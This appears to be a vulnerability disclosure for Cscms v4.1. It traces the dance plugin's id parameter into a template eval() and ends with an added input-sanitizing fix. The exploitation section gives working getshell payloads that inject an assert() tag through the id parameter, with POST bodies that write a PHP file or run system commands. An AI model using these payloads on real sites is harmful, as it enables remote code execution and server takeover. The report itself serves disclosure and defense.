```php
// play song
public function index()
{
    // User-controlled value; get(..., TRUE) only applies XSS filtering
    $ids = $this->input->get('id', TRUE);
    if (empty($ids)) {
        // No id supplied: pick 30 random dance records
        $sqlstr = "select id from " . CS_SqlPrefix . "dance order by rand() desc LIMIT 30";
        $result = $this->db->query($sqlstr);
        $recount = $result->num_rows();
        if ($recount > 0) {
            foreach ($result->result() as $row) {
                $ids .= $row->id . ",";
            }
        }
    }
    if (substr($ids, -1) == ",") $ids = substr($ids, 0, -1);
    // The raw id string becomes a template variable
    $zdy['{cscms:lbid}'] = $ids;
    // Load template and output
    $this->Cstpl->plub_show('dance', array(), $ids, FALSE, 'playsong.html', '音乐盒 - ' . Web_Name, '', '', '', $zdy);
}
```
1、Vulnerability summary
Vulnerability name: Cscms v4.1 code execution vulnerability
Report date: 2020-04-13
Exploit author: Zhou Zi Qiao
Product home: http://www.chshcms.com/down.html
Software link: http://www.chshcms.com/down.html
Version: v4.1
2、Vulnerability overview
Vulnerability file: \cscms4.1\plugins\dance\Playsong.php
Vulnerability function: index
The id parameter is read here, assigned into the $zdy array, and passed into the plub_show() function:
$this->Cstpl->plub_show('dance', array(), $ids, FALSE, 'playsong.html', '音乐盒 - ' . Web_Name, '', '', '', $zdy);
Following this function, the $zdy we passed in (i.e. $fidetpl) is parsed and appended to the $Mark_Text variable.
At the end there is this check:
when $return == FALSE the branch is entered and executes
$this->Csskins->labelif($Mark_Text);
Following this function, the labelif2() function is called on its first line; after some checks it finally calls eval(), resulting in code execution.
3、Vulnerability exploitation
http://localhost/index.php/dance/playsong/index
Front-end getshell (requires the dance module to be enabled)
payload: http://localhost/index.php/dance/playsong/index?id=1,2,3{toif:assert($_POST[1])}{end toif}
POST body: 1=file_put_contents('./packs/admin/atest.php','')
This creates a test file in the specified folder and writes the specified code into it.
or payload: http://127.0.0.45/index.php/dance/playsong/index?id=1,2,3{toif:assert($_POST[1])} 112 {end toif}
POST body:
1=phpinfo()
1=system("dir")
We can see that the code is executed.
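As an added example (not code from Cscms or from this report), one input-side control that keeps the payload above out of the template: an allow-list that reduces id to a comma-separated list of positive integers before it is assigned to {cscms:lbid}. The function name sanitize_ids() and the sample inputs are my own assumptions; the eval() reachable through labelif()/labelif2() remains the root cause to fix in the template engine.

```php
<?php
// Added example, not Cscms's own code: an allow-list filter for the id
// parameter so that only "1,2,3"-style integer lists ever reach the
// {cscms:lbid} template variable, leaving no room for a {toif:...} tag.

/**
 * Keep only positive integers from a comma-separated id list, dropping
 * duplicates and capping the count (mirroring the LIMIT 30 in index()).
 * A segment containing anything but digits (braces, quotes, letters)
 * is discarded whole rather than partially trusted.
 */
function sanitize_ids(string $raw, int $max = 30): string
{
    $clean = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        // ctype_digit() is false for '', '-1', '1 ', '3{toif:...' etc.
        if (ctype_digit($part) && (int) $part > 0) {
            $clean[(int) $part] = true;            // array key de-duplicates
            if (count($clean) >= $max) {
                break;
            }
        }
    }
    return implode(',', array_keys($clean));
}

// In the controller this would replace the raw assignment (hypothetical,
// assuming the CodeIgniter-style $this->input seen in the report):
//   $ids = sanitize_ids((string) $this->input->get('id', TRUE));
// An empty result then falls through to the original random-30 query path.

// Constructed inputs, including the payload quoted in the report.
$samples = [
    '1,2,3',
    '1,2,3{toif:assert($_POST[1])}{end toif}',
    ' 7 , 007 ,0,-4,abc',
    '',
];
foreach ($samples as $s) {
    printf("%-45s => \"%s\"\n", $s, sanitize_ids($s));
}
```

On the report's payload the third segment fails ctype_digit() and is dropped whole, so only 1,2 reaches the template.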